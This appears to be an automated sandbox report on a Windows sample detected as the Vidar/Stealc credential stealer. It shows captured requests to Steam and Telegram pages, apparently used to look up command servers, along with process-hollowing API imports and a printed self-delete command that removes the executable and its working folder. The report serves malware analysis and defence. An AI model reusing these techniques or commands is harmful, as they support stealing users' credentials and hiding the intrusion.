https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Wed, 18 Dec 2024 10:37:35 GMT Content-Length: 35483 Connection: close Set-Cookie: sessionid=efb104f3184f4bfb97b08ad8; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-18 10:37:35 UTC	14467	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-18 10:37:35 UTC	10109	IN	Data Raw: 6f 72 6b 73 68 6f 70 2f 22 3e 0a 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6d 61 72 6b 65 74 2f 22 3e 0a 09 09 09 09 09 09 4d 61 72 6b 65 74 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 Data Ascii: orkshop/">Workshop</a><a class="submenuitem" href="https://steamcommunity.com/market/">Market</a><a class="submenuitem" href="https://steamcommunity.com/?subsection=broadcasts">Broad
2024-12-18 10:37:35 UTC	10907	IN	Data Raw: 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4c 41 4e 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6c 61 6e 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 4e 52 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 32 5f 31 30 30 33 30 30 5f 44 65 66 61 75 6c 74 41 63 74 69 6f 6e 5f 26 71 75 6f 74 3b 7d 22 0a 09 09 20 64 61 74 61 2d 75 73 65 72 69 6e 66 6f 3d 22 5b 5d 22 3e 0a 09 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 5f 63 6f 6e 66 69 67 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 20 20 64 61 74 61 2d 63 6f 6e 66 69 67 3d 22 7b 26 71 75 6f 74 3b 45 55 Data Ascii: /","CLAN_CDN_ASSET_URL":"https:\/\/clan.cloudflare.steamstatic.com\/","SNR":"2_100300_DefaultAction_"}" data-userinfo="[]"></div><div id="application_config" style="display: none;" data-config="{"EU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49725	149.154.167.99	443	3636	C:\Users\user\Desktop\noll.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 10:37:37 UTC	84	OUT	GET /ae5ed HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 10:37:37 UTC	510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 18 Dec 2024 10:37:37 GMT Content-Type: text/html; charset=utf-8 Content-Length: 9524 Connection: close Set-Cookie: stel_ssid=5dff49e671e4ed2218_8487868024428388287; expires=Thu, 19 Dec 2024 10:37:37 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-12-18 10:37:37 UTC	9524	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 65 35 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @ae5ed</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent.

Target ID:	0
Start time:	05:37:09
Start date:	18/12/2024
Path:	C:\Users\user\Desktop\noll.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\noll.exe"
Imagebase:	0x80000
File size:	393'216 bytes
MD5 hash:	D78F753A16D17675FB2AF71D58D479B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000000.2036904978.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.2036904978.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000000.2036904978.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:37:37
Start date:	18/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\noll.exe" & rd /s /q "C:\ProgramData\HJDHCFCBGIDG" & exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:37:37
Start date:	18/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:37:37
Start date:	18/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0x7ff6d64d0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	13.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	22

Executed Functions

Function 00098950 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,000972CA), ref: 00098964
GetProcAddress.KERNEL32 ref: 0009897B
GetProcAddress.KERNEL32 ref: 00098992
GetProcAddress.KERNEL32 ref: 000989A9
GetProcAddress.KERNEL32 ref: 000989C0
GetProcAddress.KERNEL32 ref: 000989D7
GetProcAddress.KERNEL32 ref: 000989EE
GetProcAddress.KERNEL32 ref: 00098A05
GetProcAddress.KERNEL32 ref: 00098A1C
GetProcAddress.KERNEL32 ref: 00098A33
GetProcAddress.KERNEL32 ref: 00098A4A
GetProcAddress.KERNEL32 ref: 00098A61
GetProcAddress.KERNEL32 ref: 00098A78
GetProcAddress.KERNEL32 ref: 00098A8F
GetProcAddress.KERNEL32 ref: 00098AA6
GetProcAddress.KERNEL32 ref: 00098ABD
GetProcAddress.KERNEL32 ref: 00098AD4
GetProcAddress.KERNEL32 ref: 00098AEB
GetProcAddress.KERNEL32 ref: 00098B02
GetProcAddress.KERNEL32 ref: 00098B19
GetProcAddress.KERNEL32 ref: 00098B30
GetProcAddress.KERNEL32 ref: 00098B47
GetProcAddress.KERNEL32 ref: 00098B5E
GetProcAddress.KERNEL32 ref: 00098B75
GetProcAddress.KERNEL32 ref: 00098B8C
GetProcAddress.KERNEL32 ref: 00098BA3
GetProcAddress.KERNEL32 ref: 00098BBA
GetProcAddress.KERNEL32 ref: 00098BD1
GetProcAddress.KERNEL32 ref: 00098BE8
GetProcAddress.KERNEL32 ref: 00098BFF
GetProcAddress.KERNEL32 ref: 00098C16
GetProcAddress.KERNEL32 ref: 00098C2D
GetProcAddress.KERNEL32 ref: 00098C44
GetProcAddress.KERNEL32 ref: 00098C5B
GetProcAddress.KERNEL32 ref: 00098C72
GetProcAddress.KERNEL32 ref: 00098C89
GetProcAddress.KERNEL32 ref: 00098CA0
GetProcAddress.KERNEL32 ref: 00098CB7
GetProcAddress.KERNEL32 ref: 00098CCE
GetProcAddress.KERNEL32 ref: 00098CE5
GetProcAddress.KERNEL32 ref: 00098CFC
GetProcAddress.KERNEL32 ref: 00098D13
GetProcAddress.KERNEL32 ref: 00098D2A
GetProcAddress.KERNEL32(CreateProcessA), ref: 00098D40
GetProcAddress.KERNEL32(GetThreadContext), ref: 00098D56
GetProcAddress.KERNEL32(ReadProcessMemory), ref: 00098D6C
GetProcAddress.KERNEL32(VirtualAllocEx), ref: 00098D82
GetProcAddress.KERNEL32(ResumeThread), ref: 00098D98
GetProcAddress.KERNEL32(WriteProcessMemory), ref: 00098DAE
GetProcAddress.KERNEL32(SetThreadContext), ref: 00098DC4
LoadLibraryA.KERNEL32(000972CA), ref: 00098DD5
LoadLibraryA.KERNEL32 ref: 00098DE6
LoadLibraryA.KERNEL32 ref: 00098DF7
LoadLibraryA.KERNEL32 ref: 00098E08
LoadLibraryA.KERNEL32 ref: 00098E19
LoadLibraryA.KERNEL32 ref: 00098E2A
LoadLibraryA.KERNEL32 ref: 00098E3B
LoadLibraryA.KERNEL32 ref: 00098E4C
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00098E5C
GetProcAddress.KERNEL32(75FD0000), ref: 00098E77
GetProcAddress.KERNEL32 ref: 00098E8E
GetProcAddress.KERNEL32 ref: 00098EA5
GetProcAddress.KERNEL32 ref: 00098EBC
GetProcAddress.KERNEL32 ref: 00098ED3
GetProcAddress.KERNEL32(734B0000), ref: 00098EF2
GetProcAddress.KERNEL32 ref: 00098F09
GetProcAddress.KERNEL32 ref: 00098F20
GetProcAddress.KERNEL32 ref: 00098F37
GetProcAddress.KERNEL32 ref: 00098F4E
GetProcAddress.KERNEL32 ref: 00098F65
GetProcAddress.KERNEL32 ref: 00098F7C
GetProcAddress.KERNEL32 ref: 00098F93
GetProcAddress.KERNEL32(763B0000), ref: 00098FAE
GetProcAddress.KERNEL32 ref: 00098FC5
GetProcAddress.KERNEL32 ref: 00098FDC
GetProcAddress.KERNEL32 ref: 00098FF3
GetProcAddress.KERNEL32 ref: 0009900A
GetProcAddress.KERNEL32(750F0000), ref: 00099029
GetProcAddress.KERNEL32 ref: 00099040
GetProcAddress.KERNEL32 ref: 00099057
GetProcAddress.KERNEL32 ref: 0009906E
GetProcAddress.KERNEL32 ref: 00099085
GetProcAddress.KERNEL32 ref: 0009909C
GetProcAddress.KERNEL32(75A50000), ref: 000990BB
GetProcAddress.KERNEL32 ref: 000990D2
GetProcAddress.KERNEL32 ref: 000990E9
GetProcAddress.KERNEL32 ref: 00099100
GetProcAddress.KERNEL32 ref: 00099117
GetProcAddress.KERNEL32 ref: 0009912E
GetProcAddress.KERNEL32 ref: 00099145
GetProcAddress.KERNEL32 ref: 0009915C
GetProcAddress.KERNEL32 ref: 00099173
GetProcAddress.KERNEL32(75070000), ref: 0009918E
GetProcAddress.KERNEL32 ref: 000991A5
GetProcAddress.KERNEL32 ref: 000991BC
GetProcAddress.KERNEL32 ref: 000991D3
GetProcAddress.KERNEL32 ref: 000991EA
GetProcAddress.KERNEL32(74E50000), ref: 00099205
GetProcAddress.KERNEL32 ref: 0009921C
GetProcAddress.KERNEL32(75320000), ref: 00099237
GetProcAddress.KERNEL32 ref: 0009924E
GetProcAddress.KERNEL32(6F060000), ref: 0009926D
GetProcAddress.KERNEL32 ref: 00099284
GetProcAddress.KERNEL32 ref: 0009929B
GetProcAddress.KERNEL32 ref: 000992B2
GetProcAddress.KERNEL32 ref: 000992C9
GetProcAddress.KERNEL32 ref: 000992E0
GetProcAddress.KERNEL32 ref: 000992F7
GetProcAddress.KERNEL32 ref: 0009930E
GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00099324
GetProcAddress.KERNEL32(InternetSetOptionA), ref: 0009933A
GetProcAddress.KERNEL32(74E00000), ref: 00099355
GetProcAddress.KERNEL32 ref: 0009936C
GetProcAddress.KERNEL32 ref: 00099383
GetProcAddress.KERNEL32 ref: 0009939A
GetProcAddress.KERNEL32(74DF0000), ref: 000993B5
GetProcAddress.KERNEL32(6F8D0000), ref: 000993D0
GetProcAddress.KERNEL32 ref: 000993E7
GetProcAddress.KERNEL32 ref: 000993FE
GetProcAddress.KERNEL32 ref: 00099415
GetProcAddress.KERNEL32(6C600000,SymMatchString), ref: 0009942F

Strings

WriteProcessMemory, xrefs: 00098D9E
GetThreadContext, xrefs: 00098D46
VirtualAllocEx, xrefs: 00098D72
HttpQueryInfoA, xrefs: 00099314
ReadProcessMemory, xrefs: 00098D5C
ResumeThread, xrefs: 00098D88
SymMatchString, xrefs: 00099429
CreateProcessA, xrefs: 00098D30
SetThreadContext, xrefs: 00098DB4
dbghelp.dll, xrefs: 00098E52
InternetSetOptionA, xrefs: 0009932A

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
API String ID: 2238633743-2740034357
Opcode ID: b3905b6fa3074026e41d427c5a1f9397fd1401337cafd6ae0b0a2d0fe34855ed
Instruction ID: 0a89d2afac350e0e8679f771120ddebefb45063f7479495b9a5b1f3be14fb51f
Opcode Fuzzy Hash: b3905b6fa3074026e41d427c5a1f9397fd1401337cafd6ae0b0a2d0fe34855ed
Instruction Fuzzy Hash: E852C175D02212AFEF427F60FE4C9243BA6F758745353852BE9058A2B0E7724C64EF16

Function 00091807 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143
memorycomtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 0009180E
CoInitializeEx.OLE32(00000000,00000000,0000004C,00093EF9,Install Date: ,000B68B0,00000000,Windows: ,000B68A0,Work Dir: In memory,000B6888), ref: 0009181F
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00091830
CoCreateInstance.OLE32(000B2F00,00000000,00000001,000B2E30,?), ref: 0009184A
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00091880
VariantInit.OLEAUT32(?), ref: 000918DB

Part of subcall function 00091757: __EH_prolog3_catch.LIBCMT ref: 0009175E
Part of subcall function 00091757: CoCreateInstance.OLE32(000B31B0,00000000,00000001,000BAF60,?,00000018,00091901,?), ref: 00091781
Part of subcall function 00091757: SysAllocString.OLEAUT32(?), ref: 0009178E
Part of subcall function 00091757: _wtoi64.MSVCRT ref: 000917C1
Part of subcall function 00091757: SysFreeString.OLEAUT32(?), ref: 000917DA
Part of subcall function 00091757: SysFreeString.OLEAUT32(00000000), ref: 000917E1

FileTimeToSystemTime.KERNEL32(?,?), ref: 0009190A
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00091916
HeapAlloc.KERNEL32(00000000), ref: 0009191D
VariantClear.OLEAUT32(?), ref: 0009195C
wsprintfA.USER32 ref: 00091949

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Strings

WQL, xrefs: 0009189A
InstallDate, xrefs: 000918ED
Unknown, xrefs: 00091971
Unknown, xrefs: 00091985
ROOT\CIMV2, xrefs: 00091862
Unknown, xrefs: 0009196A
%d/%d/%d %d:%d:%d, xrefs: 00091943
Select * From Win32_OperatingSystem, xrefs: 00091895

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
API String ID: 2280294774-461178377
Opcode ID: 314aacbb353075b4027dfb066fe33fd0831d66bc9083b6ed71696ef8b1e7563c
Instruction ID: e27718c6c45cb07ad67fe1a5751a0b2006452fe0f2b978a863ea742e6f2064cd
Opcode Fuzzy Hash: 314aacbb353075b4027dfb066fe33fd0831d66bc9083b6ed71696ef8b1e7563c
Instruction Fuzzy Hash: 2E414C71A40205BBDF209BD5DC89EFFBBBCEF89B11F104219F611AA190D6799941DB20

Function 0009C472 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/, xrefs: 0009C525
UT, xrefs: 0009C79D

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: 9e6827123cf2188a5408b35bfa2c12cac5eb3b88dd5c09e9b0779c5f85c328ea
Instruction ID: 4f0cbb0387fee8ea1e84b71add22296a6f0568e473626f7747e8b6b2ddad6ab1
Opcode Fuzzy Hash: 9e6827123cf2188a5408b35bfa2c12cac5eb3b88dd5c09e9b0779c5f85c328ea
Instruction Fuzzy Hash: 390281B1D042688FEF61CF64C880BEEBBB5AF45304F1444E9D949AB242D7349E84DF95

Function 00086963 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538

Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AE8
Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AEE
Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AF4
Part of subcall function 00084AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00084B06
Part of subcall function 00084AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00084B0E

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000869C5
StrCmpCA.SHLWAPI(?), ref: 000869DF
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00086A0E
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00086A4D
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00086A7D
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00086A88
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00086AAC
InternetReadFile.WININET(?,?,000007CF,?), ref: 00086B40
InternetCloseHandle.WININET(?), ref: 00086B50
InternetCloseHandle.WININET(?), ref: 00086B5C
InternetCloseHandle.WININET(?), ref: 00086B68

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
